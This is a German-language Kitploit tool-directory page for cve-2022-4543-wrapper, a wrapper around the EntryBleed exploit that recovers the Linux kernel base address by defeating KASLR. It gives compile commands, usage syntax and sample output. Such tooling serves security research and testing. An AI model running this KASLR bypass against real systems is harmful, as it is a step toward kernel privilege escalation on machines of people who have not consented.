Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
cve-2022-4543-wrapper — Wrapper für den CVE-2022-4543 Exploit, der die Kernel-Basisadresse durch KASLR-Bypass entrandomisiert und so zuverlässige Kernel-Ausnutzung auf betroffenen Linux-Systemen ermöglicht. | Kitploit
Tools/GitHubGitHub/sunichi/cve-2022-4543-wrapper
SchwachstellenanalyseExploitationInformationsbeschaffungBinary-Exploitation
GitHubsunichi/cve-2022-4543-wrapper

cve-2022-4543-wrapper

Wrapper für den CVE-2022-4543 Exploit, der die Kernel-Basisadresse durch KASLR-Bypass entrandomisiert und so zuverlässige Kernel-Ausnutzung auf betroffenen Linux-Systemen ermöglicht.

Repository anzeigen
31vor 2 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

cve-2022-4543-wrapper

Einleitung

Dies ist ein Wrapper des Exploits CVE-2022-4543 von willsroot, der Ihnen hilft, die Kernel-Basisadresse zu ermitteln.

Verwendung

Kompilieren

Je nach Bedarf (optional):

root@kitploit:~
gcc dekaslr.c --static -o dekaslr
g++ main.cpp --static -o main

Bei manchen Betriebssystemen muss zuerst die statische libc installiert werden.

De-KASLR

root@kitploit:~
./main
[*] Usage: ./binary dekaslr_path entry_SYSCALL_64_offset(in hex) max_loop
root@kitploit:~
$ ./main ./dekaslr 0x100000 200
ffffffffa2600000: 53/200

Nachdem beide Programme ausgeführt wurden, wird die häufigste Adresse basierend auf Ihrem Offset angezeigt.

In der Praxis erscheint die echte Kernel-Basisadresse in mehr als 1/4 der Versuche. Empfehlung: mehr als 100 Versuche.

Referenzen

  • https://www.willsroot.io/2022/12/entrybleed.html
  • https://access.redhat.com/security/cve/cve-2022-4543
Tool herunterladen